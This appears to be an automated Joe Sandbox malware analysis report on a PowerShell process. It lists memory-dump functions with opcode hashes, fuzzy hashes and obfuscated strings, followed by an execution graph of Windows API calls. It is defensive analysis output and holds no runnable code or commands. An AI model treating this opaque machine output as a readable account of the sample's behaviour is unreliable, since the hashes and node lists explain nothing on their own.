                                          • Opcode ID: f7f119da07029a6ac9b34b7ddc0598d36fc0e23cb13050280314cb20bf268adf
                                          • Instruction ID: e26e8d6cf03e0ce5dd1f617d0713f32aa26e2880e548f20b9973c241e6f3dd93
                                          • Opcode Fuzzy Hash: f7f119da07029a6ac9b34b7ddc0598d36fc0e23cb13050280314cb20bf268adf
                                          • Instruction Fuzzy Hash: A79176B47083068FDB54ABB88811B7A7BA2AF86301F14C1AAD447CF391DA76EC41C761
                                          Function 07681FB2 Relevance: .3, Instructions: 265COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b20e4bbeb063de1ecf9c325e05d9b039fa754d43f68a83582d86965e8ffae874
                                          • Instruction ID: dc4e88f3a157c1fe196b8e1674e4dad76c7ab7286d814908e0a03d05058672d0
                                          • Opcode Fuzzy Hash: b20e4bbeb063de1ecf9c325e05d9b039fa754d43f68a83582d86965e8ffae874
                                          • Instruction Fuzzy Hash: A28176B1704345DFC762AB75D820B6ABBB2FF82211F24C16BD596CB351CA31C846C7A1
                                          Function 0481FAB4 Relevance: .3, Instructions: 262COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9e08261db17c03cf2c1de2a99c1bf832d9b8d09253dbb1d8a0e69800eafbaa30
                                          • Instruction ID: 43a009af83f7d9636de79f37402792035de6387111db8d3adbc32c6d8ed73e17
                                          • Opcode Fuzzy Hash: 9e08261db17c03cf2c1de2a99c1bf832d9b8d09253dbb1d8a0e69800eafbaa30
                                          • Instruction Fuzzy Hash: 6BA18371E00209CFDB10CFA8D8957DEBBF5BF48314F148A2ADA15E7264EB75A845CB81
                                          Function 04812B48 Relevance: .2, Instructions: 242COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 03204e18ffefffeabd9a85a5106344ea0a92776d296cf42ebfd202b9d7a40b56
                                          • Instruction ID: fe2c76275df19ebd93b402bd139a649ba8b5ce3273c01fc3a6f63c6b4e239e39
                                          • Opcode Fuzzy Hash: 03204e18ffefffeabd9a85a5106344ea0a92776d296cf42ebfd202b9d7a40b56
                                          • Instruction Fuzzy Hash: 7DA1AD74A04649CFCB06CF98C494AAAFBB5FF49310B248A9AD555EB3A5C331FC51CB90
                                          Function 07684138 Relevance: .2, Instructions: 211COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c1cb7aeacdf3e6f40a40d4e7030eba12b68736ad7d326c056975d0b8e2cfa9ce
                                          • Instruction ID: 44fe4e6fb74f6f2e30f9e1a2d117f87c9e1a62147ada85a1f68af21f8dfd00ad
                                          • Opcode Fuzzy Hash: c1cb7aeacdf3e6f40a40d4e7030eba12b68736ad7d326c056975d0b8e2cfa9ce
                                          • Instruction Fuzzy Hash: FF6146B1708387DFDB559F75C850766BFB1AF82211F25C2AAD4468F282CE31C842C761
                                          Function 04818DE8 Relevance: .2, Instructions: 206COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fee7fee018221bf71b919ce0bfe44a7072f8ac15af4edbd6f79dbf26cad38755
                                          • Instruction ID: 8161421a3fe6726aab9208afc1b3b044aab063e4f800f6cd36373247d97c9d25
                                          • Opcode Fuzzy Hash: fee7fee018221bf71b919ce0bfe44a7072f8ac15af4edbd6f79dbf26cad38755
                                          • Instruction Fuzzy Hash: 3F81BC30A05204DFCB15DFA4D8859ADBBF6FF89314F2889AAE405DB321CB35E941CB50
                                          Function 04819D48 Relevance: .2, Instructions: 190COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e36593156123e32289276642d2c736652e2f5b762538f750219d1defe8582888
                                          • Instruction ID: ff6c34b4216ba7fd4cd006228a39c7d6092caf49274e255170e02c2af64229d7
                                          • Opcode Fuzzy Hash: e36593156123e32289276642d2c736652e2f5b762538f750219d1defe8582888
                                          • Instruction Fuzzy Hash: 62719F70A00209CFDB14DF68D884A9EBBF6BF84354F14896ED416DB261EB71AC46CB80
                                          Function 04819EB6 Relevance: .2, Instructions: 188COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e78f6e0193894310bc138c5d29795fccb21b8cc5cb005ead388fa2c6e733627
                                          • Instruction ID: 4d78182e9477bed94e24a273ee3ee99fe2fd969df23daf81afa22ef076300c69
                                          • Opcode Fuzzy Hash: 7e78f6e0193894310bc138c5d29795fccb21b8cc5cb005ead388fa2c6e733627
                                          • Instruction Fuzzy Hash: A5712B70E00208DFDB18DFB5D490BADBBB6BF88354F148929D412EB2A0DB75AD46CB51
                                          Function 07689834 Relevance: .1, Instructions: 144COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cbf34e518135431020818b74449d6b18288d144316d4860ca3660ff42a9d2d94
                                          • Instruction ID: 4fe8728e75fbc5db3f0d3a0466dfb338f94049f11aa697f329a07da8af08a6be
                                          • Opcode Fuzzy Hash: cbf34e518135431020818b74449d6b18288d144316d4860ca3660ff42a9d2d94
                                          • Instruction Fuzzy Hash: E54121F0B00302DFDB60AE788840B7977E6AB86351F0882A6D9079F755E736ED41C762
                                          Function 04819D33 Relevance: .1, Instructions: 144COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be7cdcc7660cbf22e2eb1a80ff8d0ed34b6acdddc8cf129e507379aec21a6dcc
                                          • Instruction ID: dc3ba7ec5fc25f0ff8d704e20c8b2090224ea50251ac9ad7c177ea5ff282bf18
                                          • Opcode Fuzzy Hash: be7cdcc7660cbf22e2eb1a80ff8d0ed34b6acdddc8cf129e507379aec21a6dcc
                                          • Instruction Fuzzy Hash: 75514EB1E00208DFDB14DFA5D8947AEBBB6BF84354F14892DD006EB2A4DBB5A845CB50
                                          Function 04812C58 Relevance: .1, Instructions: 107COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 603d6f22638528c8b3e98ecd9fcdc62c04d32425e815945de79fc7ccf0aa76ed
                                          • Instruction ID: 0c288f1c59310a65a4451f3de030feacfa58abacca0032a8e06fa2c9fa4b35b9
                                          • Opcode Fuzzy Hash: 603d6f22638528c8b3e98ecd9fcdc62c04d32425e815945de79fc7ccf0aa76ed
                                          • Instruction Fuzzy Hash: 62410A78A005099FDB05CF59C594AAAF7B5FF48310B158AAAD515AB3A4C732FC50CBA0
                                          Function 0768B17A Relevance: .1, Instructions: 85COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a190172a07b60fa5ad4f3a2bf4c9a3ea90ff74270af55e06df4a118630e767fe
                                          • Instruction ID: 481a7eb8e555a02d4ddf40b4c8ba00f22ccd968f73b45c3e0742e6534d99751e
                                          • Opcode Fuzzy Hash: a190172a07b60fa5ad4f3a2bf4c9a3ea90ff74270af55e06df4a118630e767fe
                                          • Instruction Fuzzy Hash: AE217BF27002108BE720A278A812BAEF3A39FC5260B14C57BC5478F741DA75DC52C3D1
                                          Function 048139D8 Relevance: .1, Instructions: 73COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: aacb7db2a9c320c8b11c92f0cc94d07177efeb09dd4da556c0083956db8dc352
                                          • Instruction ID: 47b5b03d8f43b36f36bfcf8095683680110f9870033cfbd20d133fd39aa9f660
                                          • Opcode Fuzzy Hash: aacb7db2a9c320c8b11c92f0cc94d07177efeb09dd4da556c0083956db8dc352
                                          • Instruction Fuzzy Hash: 6921A1B4E052099FDB01CF58D8809AAFBF4FF49310B15859AE809EB362C735ED45CBA1
                                          Function 048145B0 Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e0202dda3baf582e1a76c2e532120c5c280c6384e353afc8fe9a88b7b7c3e9cc
                                          • Instruction ID: 83520b702e46ace9b86d136d9dad8bcc122b480761084d30b3752700982741b4
                                          • Opcode Fuzzy Hash: e0202dda3baf582e1a76c2e532120c5c280c6384e353afc8fe9a88b7b7c3e9cc
                                          • Instruction Fuzzy Hash: 8821D474A00619DFDB04DF99C894AAAF7B5FF88310B158669E809E7761C731E851CBA0
                                          Function 048139C9 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1845291372.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_4810000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2dfb526ca74570ad0f3ce63b6ea8e44d18d59a9c96911443693dca8c53b144e3
                                          • Instruction ID: 686f0c539734d243e95b34a61254a723c4b889370e584ce010be3ec9b5caba92
                                          • Opcode Fuzzy Hash: 2dfb526ca74570ad0f3ce63b6ea8e44d18d59a9c96911443693dca8c53b144e3
                                          • Instruction Fuzzy Hash: 53211774A056498FCB00DF98D4909AAFBB5FF49310B14859AE849EB362C731FD41CBA1
                                          Function 07681D15 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5c91b0baa64d55ea949db4402ba0c066e608b67bca94e269cc64ef192b0b2804
                                          • Instruction ID: 29c1f95ea1b60a2387abfd957f8efa6a1f161eb4dcd77124c772660377f80301
                                          • Opcode Fuzzy Hash: 5c91b0baa64d55ea949db4402ba0c066e608b67bca94e269cc64ef192b0b2804
                                          • Instruction Fuzzy Hash: B61186B560424ADFD7A99A64D840F22BBB5EF83215F18875FD8068F356DB32D802C751
                                          Function 07684328 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e208b483aa3b7b0cb1054ba16f8246f8fdaf0e3400530a579fbdb2248061d24a
                                          • Instruction ID: 372daaa3ec9a19a5d6e5a89d54dffd1b6425a2f8a39b6f74806b60c6779064d3
                                          • Opcode Fuzzy Hash: e208b483aa3b7b0cb1054ba16f8246f8fdaf0e3400530a579fbdb2248061d24a
                                          • Instruction Fuzzy Hash: FAE0DFB0200143DBCB50DF04C980A54BBA2BB80609F28C298E01A0F282CB32DA43CB08

                                          Non-executed Functions

                                          Function 07680BB0 Relevance: 5.4, Strings: 4, Instructions: 410COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 84Cl$84Cl$84Cl$84Cl
                                          • API String ID: 0-733557901
                                          • Opcode ID: 776ac19ed1329c08256a71109a7091baa400e1c5e0000a54142aac8ecc537efe
                                          • Instruction ID: d1be827efea2e4cbf4632e998c107ce2d55f7bae93c8a97ac0b4c26ed3fea9b4
                                          • Opcode Fuzzy Hash: 776ac19ed1329c08256a71109a7091baa400e1c5e0000a54142aac8ecc537efe
                                          • Instruction Fuzzy Hash: 59E1C3B4B00219DFDB58EFA4C444BAEB7A2BF89310F148569E906AF350DB71DC46CB91
                                          Function 07680148 Relevance: 5.3, Strings: 4, Instructions: 287COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: T5k$DU5k$XYEl$XYEl
                                          • API String ID: 0-1081426554
                                          • Opcode ID: ee2855e21f307036c1e831cc545600e559f406660ca9f851e6b780f45ed198dc
                                          • Instruction ID: d3f2b5ad1f89ee584464052c9ae1afef71a5031a43e0aa80116a6ec86fbe24a7
                                          • Opcode Fuzzy Hash: ee2855e21f307036c1e831cc545600e559f406660ca9f851e6b780f45ed198dc
                                          • Instruction Fuzzy Hash: 77912AB1B04206CFC751EB78D450BAAF7A2AFC9221F24C66AD406DB351DA71CC49C7A1
                                          Function 07688F10 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1853852500.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_7680000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (fEl$(fEl$(fEl$(fEl
                                          • API String ID: 0-1594125813
                                          • Opcode ID: 54178ea7ee9cb99f13dc0d577cb1d7381d81123e0ac9ffa196e313acac5e3912
                                          • Instruction ID: 741752afd3e4b117424865ba75b72e3a0933ad801122db1fdee76ffbd90ba377
                                          • Opcode Fuzzy Hash: 54178ea7ee9cb99f13dc0d577cb1d7381d81123e0ac9ffa196e313acac5e3912
                                          • Instruction Fuzzy Hash: 04718DB4B10205DFE754EF68C844FAAB7B2AF89310F54C169D806AB344DB72EC41CB91

                                          Execution Graph

                                          Execution Coverage:3.4%
                                          Dynamic/Decrypted Code Coverage:99.7%
                                          Signature Coverage:3%
                                          Total number of Nodes:1581
                                          Total number of Limit Nodes:22
                                          execution_graph 6458 22b23eb3 6461 22b25411 6458->6461 6462 22b2541d _abort 6461->6462 6467 22b25af6 GetLastError 6462->6467 6464 22b25422 6487 22b255a8 6464->6487 6468 22b25b12 6467->6468 6469 22b25b0c 6467->6469 6471 22b2637b __dosmaperr 20 API calls 6468->6471 6473 22b25b61 SetLastError 6468->6473 6470 22b25e08 __dosmaperr 11 API calls 6469->6470 6470->6468 6472 22b25b24 6471->6472 6474 22b25b2c 6472->6474 6475 22b25e5e __dosmaperr 11 API calls 6472->6475 6473->6464 6476 22b2571e _free 20 API calls 6474->6476 6477 22b25b41 6475->6477 6478 22b25b32 6476->6478 6477->6474 6479 22b25b48 6477->6479 6481 22b25b6d SetLastError 6478->6481 6480 22b2593c __dosmaperr 20 API calls 6479->6480 6482 22b25b53 6480->6482 6483 22b255a8 _abort 35 API calls 6481->6483 6484 22b2571e _free 20 API calls 6482->6484 6485 22b25b79 6483->6485 6486 22b25b5a 6484->6486 6486->6473 6486->6481 6498 22b27613 6487->6498 6490 22b255b8 6492 22b255c2 IsProcessorFeaturePresent 6490->6492 6497 22b255e0 6490->6497 6493 22b255cd 6492->6493 6528 22b260e2 6493->6528 6534 22b24bc1 6497->6534 6537 22b27581 6498->6537 6501 22b2766e 6502 22b2767a _abort 6501->6502 6503 22b25b7a __dosmaperr 20 API calls 6502->6503 6507 22b276a7 _abort 6502->6507 6510 22b276a1 _abort 6502->6510 6503->6510 6504 22b276f3 6506 22b26368 __dosmaperr 20 API calls 6504->6506 6505 22b276d6 6563 22b2bdc9 6505->6563 6508 22b276f8 6506->6508 6514 22b2771f 6507->6514 6554 22b25671 RtlEnterCriticalSection 6507->6554 6551 22b262ac 6508->6551 6510->6504 6510->6505 6510->6507 6515 22b2777e 6514->6515 6517 22b27776 6514->6517 6525 22b277a9 6514->6525 6555 22b256b9 RtlLeaveCriticalSection 6514->6555 6515->6525 6556 22b27665 6515->6556 6520 22b24bc1 _abort 28 API calls 6517->6520 6520->6515 6523 22b25af6 _abort 38 API calls 6526 22b2780c 6523->6526 6524 22b27665 _abort 38 API calls 6524->6525 6559 22b2782e 6525->6559 6526->6505 6527 22b25af6 _abort 38 API calls 6526->6527 6527->6505 6529 22b260fe ___scrt_fastfail 6528->6529 6530 22b2612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6529->6530 6533 22b261fb ___scrt_fastfail 6530->6533 6531 22b22ada _ValidateLocalCookies 5 API calls 6532 22b26219 6531->6532 6532->6497 6533->6531 6582 22b2499b 6534->6582 6540 22b27527 6537->6540 6539 22b255ad 6539->6490 6539->6501 6541 22b27533 ___scrt_is_nonwritable_in_current_image 6540->6541 6546 22b25671 RtlEnterCriticalSection 6541->6546 6543 22b27541 6547 22b27575 6543->6547 6545 22b27568 _abort 6545->6539 6546->6543 6550 22b256b9 RtlLeaveCriticalSection 6547->6550 6549 22b2757f 6549->6545 6550->6549 6566 22b26231 6551->6566 6553 22b262b8 6553->6505 6554->6514 6555->6517 6557 22b25af6 _abort 38 API calls 6556->6557 6558 22b2766a 6557->6558 6558->6524 6560 22b27834 6559->6560 6561 22b277fd 6559->6561 6581 22b256b9 RtlLeaveCriticalSection 6560->6581 6561->6505 6561->6523 6561->6526 6564 22b22ada _ValidateLocalCookies 5 API calls 6563->6564 6565 22b2bdd4 6564->6565 6565->6565 6567 22b25b7a __dosmaperr 20 API calls 6566->6567 6568 22b26247 6567->6568 6569 22b262a6 6568->6569 6573 22b26255 6568->6573 6577 22b262bc IsProcessorFeaturePresent 6569->6577 6571 22b262ab 6572 22b26231 ___std_exception_copy 26 API calls 6571->6572 6574 22b262b8 6572->6574 6575 22b22ada _ValidateLocalCookies 5 API calls 6573->6575 6574->6553 6576 22b2627c 6575->6576 6576->6553 6578 22b262c7 6577->6578 6579 22b260e2 _abort 8 API calls 6578->6579 6580 22b262dc GetCurrentProcess TerminateProcess 6579->6580 6580->6571 6581->6561 6583 22b249a7 _abort 6582->6583 6584 22b249bf 6583->6584 6604 22b24af5 GetModuleHandleW 6583->6604 6613 22b25671 RtlEnterCriticalSection 6584->6613 6591 22b24a54 6597 22b24669 _abort 5 API calls 6591->6597 6592 22b249c7 6601 22b24a3c 6592->6601 6602 22b24a65 6592->6602 6614 22b2527a 6592->6614 6593 22b24a82 6624 22b24ab4 6593->6624 6594 22b24aae 6595 22b2bdc9 _abort 5 API calls 6594->6595 6600 22b24ab3 6595->6600 6597->6602 6601->6591 6617 22b24669 6601->6617 6621 22b24aa5 6602->6621 6605 22b249b3 6604->6605 6605->6584 6606 22b24b39 GetModuleHandleExW 6605->6606 6607 22b24b63 GetProcAddress 6606->6607 6610 22b24b78 6606->6610 6607->6610 6608 22b24b95 6611 22b22ada _ValidateLocalCookies 5 API calls 6608->6611 6609 22b24b8c FreeLibrary 6609->6608 6610->6608 6610->6609 6612 22b24b9f 6611->6612 6612->6584 6613->6592 6632 22b25132 6614->6632 6618 22b24698 6617->6618 6619 22b22ada _ValidateLocalCookies 5 API calls 6618->6619 6620 22b246c1 6619->6620 6620->6591 6654 22b256b9 RtlLeaveCriticalSection 6621->6654 6623 22b24a7e 6623->6593 6623->6594 6655 22b26025 6624->6655 6627 22b24ae2 6630 22b24b39 _abort 8 API calls 6627->6630 6628 22b24ac2 GetPEB 6628->6627 6629 22b24ad2 GetCurrentProcess TerminateProcess 6628->6629 6629->6627 6631 22b24aea ExitProcess 6630->6631 6635 22b250e1 6632->6635 6634 22b25156 6634->6601 6636 22b250ed ___scrt_is_nonwritable_in_current_image 6635->6636 6643 22b25671 RtlEnterCriticalSection 6636->6643 6638 22b250fb 6644 22b2515a 6638->6644 6642 22b25119 _abort 6642->6634 6643->6638 6647 22b25182 6644->6647 6648 22b2517a 6644->6648 6645 22b22ada _ValidateLocalCookies 5 API calls 6646 22b25108 6645->6646 6650 22b25126 6646->6650 6647->6648 6649 22b2571e _free 20 API calls 6647->6649 6648->6645 6649->6648 6653 22b256b9 RtlLeaveCriticalSection 6650->6653 6652 22b25130 6652->6642 6653->6652 6654->6623 6656 22b26040 6655->6656 6657 22b2604a 6655->6657 6659 22b22ada _ValidateLocalCookies 5 API calls 6656->6659 6658 22b25c45 __dosmaperr 5 API calls 6657->6658 6658->6656 6660 22b24abe 6659->6660 6660->6627 6660->6628 6969 22b25630 6970 22b2563b 6969->6970 6971 22b25eb7 11 API calls 6970->6971 6972 22b25664 6970->6972 6973 22b25660 6970->6973 6971->6970 6975 22b25688 6972->6975 6976 22b256b4 6975->6976 6977 22b25695 6975->6977 6976->6973 6978 22b2569f RtlDeleteCriticalSection 6977->6978 6978->6976 6978->6978 7318 22b263f0 7319 22b26400 7318->7319 7328 22b26416 7318->7328 7320 22b26368 __dosmaperr 20 API calls 7319->7320 7321 22b26405 7320->7321 7322 22b262ac ___std_exception_copy 26 API calls 7321->7322 7324 22b2640f 7322->7324 7325 22b26480 7325->7325 7348 22b24e76 7325->7348 7327 22b264ee 7330 22b2571e _free 20 API calls 7327->7330 7328->7325 7331 22b26561 7328->7331 7337 22b26580 7328->7337 7329 22b264e5 7329->7327 7334 22b26573 7329->7334 7354 22b285eb 7329->7354 7330->7331 7363 22b2679a 7331->7363 7335 22b262bc ___std_exception_copy 11 API calls 7334->7335 7336 22b2657f 7335->7336 7338 22b2658c 7337->7338 7338->7338 7339 22b2637b __dosmaperr 20 API calls 7338->7339 7340 22b265ba 7339->7340 7341 22b285eb 26 API calls 7340->7341 7342 22b265e6 7341->7342 7343 22b262bc ___std_exception_copy 11 API calls 7342->7343 7344 22b26615 ___scrt_fastfail 7343->7344 7345 22b266b6 FindFirstFileExA 7344->7345 7346 22b26705 7345->7346 7347 22b26580 26 API calls 7346->7347 7349 22b24e87 7348->7349 7350 22b24e8b 7348->7350 7349->7329 7350->7349 7351 22b2637b __dosmaperr 20 API calls 7350->7351 7352 22b24eb9 7351->7352 7353 22b2571e _free 20 API calls 7352->7353 7353->7349 7357 22b2853a 7354->7357 7355 22b2854f 7356 22b28554 7355->7356 7358 22b26368 __dosmaperr 20 API calls 7355->7358 7356->7329 7357->7355 7357->7356 7361 22b2858b 7357->7361 7359 22b2857a 7358->7359 7360 22b262ac ___std_exception_copy 26 API calls 7359->7360 7360->7356 7361->7356 7362 22b26368 __dosmaperr 20 API calls 7361->7362 7362->7359 7364 22b267a4 7363->7364 7365 22b267b4 7364->7365 7366 22b2571e _free 20 API calls 7364->7366 7367 22b2571e _free 20 API calls 7365->7367 7366->7364 7368 22b267bb 7367->7368 7368->7324 7575 22b23370 7586 22b23330 7575->7586 7587 22b23342 7586->7587 7588 22b2334f 7586->7588 7589 22b22ada _ValidateLocalCookies 5 API calls 7587->7589 7589->7588 7028 22b29e71 7029 22b29e95 7028->7029 7030 22b29eae 7029->7030 7032 22b2ac6b __startOneArgErrorHandling 7029->7032 7031 22b29ef8 7030->7031 7036 22b2aa53 7030->7036 7035 22b2acad __startOneArgErrorHandling 7032->7035 7046 22b2b2f0 7032->7046 7037 22b2aa70 RtlDecodePointer 7036->7037 7039 22b2aa80 7036->7039 7037->7039 7038 22b22ada _ValidateLocalCookies 5 API calls 7041 22b2ac67 7038->7041 7040 22b2ab0d 7039->7040 7042 22b2ab02 7039->7042 7044 22b2aab7 7039->7044 7040->7042 7043 22b26368 __dosmaperr 20 API calls 7040->7043 7041->7031 7042->7038 7043->7042 7044->7042 7045 22b26368 __dosmaperr 20 API calls 7044->7045 7045->7042 7047 22b2b329 __startOneArgErrorHandling 7046->7047 7049 22b2b350 __startOneArgErrorHandling 7047->7049 7057 22b2b5c1 7047->7057 7050 22b2b393 7049->7050 7052 22b2b36e 7049->7052 7070 22b2b8b2 7050->7070 7061 22b2b8e1 7052->7061 7054 22b2b38e __startOneArgErrorHandling 7055 22b22ada _ValidateLocalCookies 5 API calls 7054->7055 7056 22b2b3b7 7055->7056 7056->7035 7058 22b2b5ec __raise_exc 7057->7058 7059 22b2b7e5 RaiseException 7058->7059 7060 22b2b7fd 7059->7060 7060->7049 7062 22b2b8f0 7061->7062 7063 22b2b964 __startOneArgErrorHandling 7062->7063 7064 22b2b90f __startOneArgErrorHandling 7062->7064 7066 22b2b8b2 __startOneArgErrorHandling 20 API calls 7063->7066 7077 22b278a3 7064->7077 7067 22b2b95d 7066->7067 7067->7054 7069 22b2b8b2 __startOneArgErrorHandling 20 API calls 7069->7067 7071 22b2b8d4 7070->7071 7072 22b2b8bf 7070->7072 7074 22b26368 __dosmaperr 20 API calls 7071->7074 7073 22b2b8d9 7072->7073 7075 22b26368 __dosmaperr 20 API calls 7072->7075 7073->7054 7074->7073 7076 22b2b8cc 7075->7076 7076->7054 7079 22b278cb 7077->7079 7078 22b22ada _ValidateLocalCookies 5 API calls 7080 22b278e8 7078->7080 7079->7078 7080->7067 7080->7069 7232 22b267bf 7237 22b267f4 7232->7237 7235 22b267db 7236 22b2571e _free 20 API calls 7236->7235 7238 22b26806 7237->7238 7242 22b267cd 7237->7242 7239 22b2680b 7238->7239 7241 22b26836 7238->7241 7240 22b2637b __dosmaperr 20 API calls 7239->7240 7243 22b26814 7240->7243 7241->7242 7248 22b271d6 7241->7248 7242->7235 7242->7236 7245 22b2571e _free 20 API calls 7243->7245 7245->7242 7246 22b26851 7247 22b2571e _free 20 API calls 7246->7247 7247->7242 7249 22b271e1 7248->7249 7250 22b27209 7249->7250 7251 22b271fa 7249->7251 7252 22b27218 7250->7252 7257 22b28a98 7250->7257 7253 22b26368 __dosmaperr 20 API calls 7251->7253 7264 22b28acb 7252->7264 7256 22b271ff ___scrt_fastfail 7253->7256 7256->7246 7258 22b28aa3 7257->7258 7259 22b28ab8 RtlSizeHeap 7257->7259 7260 22b26368 __dosmaperr 20 API calls 7258->7260 7259->7252 7261 22b28aa8 7260->7261 7262 22b262ac ___std_exception_copy 26 API calls 7261->7262 7263 22b28ab3 7262->7263 7263->7252 7265 22b28ae3 